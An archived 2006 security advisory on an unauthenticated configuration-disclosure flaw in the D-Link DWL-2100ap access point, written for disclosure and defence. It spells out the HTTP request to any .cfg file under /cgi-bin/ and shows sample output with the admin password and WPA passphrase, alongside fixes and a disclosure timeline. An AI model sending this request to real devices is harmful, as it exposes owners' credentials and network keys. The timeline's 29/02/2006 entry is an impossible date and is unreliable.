TUCoPS :: Network Appliances :: b06-2773.htm

D-Link Wireless Access-Point
ADVISORY - D-Link Wireless Access-Point
ADVISORY - D-Link Wireless Access-Point


INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY

http://www.intruders.com.br/
http://www.intruders.org.br/


ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)


PRIORITY: HIGH


I - INTRUDERS:
----------------



Intruders Tiger Team Security is a project entailed with
Security Open Source (http://www.securityopensource.org.br).

The Intruders Tiger Team Security (ITTS) is a group of researchers
with more than 10 years of experience, specialized in the development
of intrusion projects (Pen-Test) and in special security projects.


All the projects of intrusion (Pen-Test) realized until the moment by
the Intruders Tiger Team Security had 100% of success.


II - INTRODUCTION:
------------------



D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g):

D-Link, the industry pioneer in wireless networking, introduces a performance
breakthrough in wireless connectivity =96 D-Link AirPlus Xtreme GTM series of
high-speed devices now capable of delivering transfer rates up to 15x faster
than the standard 802.11b with the new D-Link 108G. With the new AirPlus Xtreme
G DWL-2100AP Wireless Access Point, D-Link sets a new standard for wireless access
points.

D-Link DWL-2100ap is one of the most popular Access Point in the world.


III - DESCRIPTION:
------------------



Intruders Tiger Team Security identified during an intrusion project (Pen-Test) an
unknown vulnerability in the Access Point D-Link DWL-2100ap, that allows an attacker
to read device's configuration, without authentication with web server.

Extremely sensible informations are avaible in the configuration of the Access Point
D-Link DWL-2100ap, for example:

- User and password used to manage the device.
- Password used in WEP and WPA.
- SSID, IP, subnet mask, MAC Address filters, etc.


IV - ANALISYS:
---------------



Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found).

Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found).

However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will
return all the device configuration.


For example, making the following request:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

We would have a result equivalent to the following:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.

D-Link DWL-2100ap Access Point does not allow disable the Web server, not even has options to
filter ports.

We remember that the D-Link DWL-2100ap Access Point comes configured with default user /
password (user:admin and no password).



V. DETECTION:
-------------



Intruders Tiger Team Security confirmed the existence of this vulnerability in all firmwares
tested, also the last version 2.10na.

Possibly other(s) D-Link Access Point model(s) can be vulnerable also.


VI. SUGESTION:
--------------


D-Link company:


1 - Use strong cookies to guarantee that only authorized users will get access to configuration.

2 - Store sensible configurations like password(s) using hash(s).

3 - Allow create firewall politics and rules to filters port(s) and IP(s).

4 - Request to the user change the default user/password on the first logon, and not allow
    change the password to the last one used.

5 - Use HTTP with SSL (HTTPS).

6 - Contracts specialized companies in Pen-Test and security audit, aiming homologate the
    security of D-Link products.


D-Link customers:


1 - Upgrade the firmware of D-Link DWL-2100ap Access Point.
Direct link to download is http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp


VII - CHRONOLOGY:
-----------------



11/02/2006 - Vulnerability discovered during a Pen-Test.
15/02/2006 - D-Link World Wide Team Contacted.
17/02/2006 - No response.
18/02/2006 - D-Link World Wide Team re-contacted.
24/02/2006 - No response.
25/02/2006 - D-Link World Wide Team last try of contact.
29/02/2006 - No response.
29/02/2006 - D-Link Brazil Team Contacted.
02/03/2006 - No response.
03/03/2006 - D-Link Brazil Team re-contacted.
06/03/2006 - D-Link Brazil Team responsed.
09/03/2006 - Patch created.
14/03/2006 - Patch added to D-Link Brazil download site.
06/06/2006 - published advisory.


VIII - CREDITS:
---------------



Wendel Guglielmetti Henrique and Intruders Tiger Team Security had discovered this vulnerability.

Gratefulness to Glaudson Ocampos (Intruders Tiger Team Security), Waldemar Nehgme, Jo=E3o
Arquimedes (Security Open Source) and Ricardo N. Ferreira (Security Open Source).

Visit our website:

http://www.intruders.com.br/
http://www.intruders.org.br/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH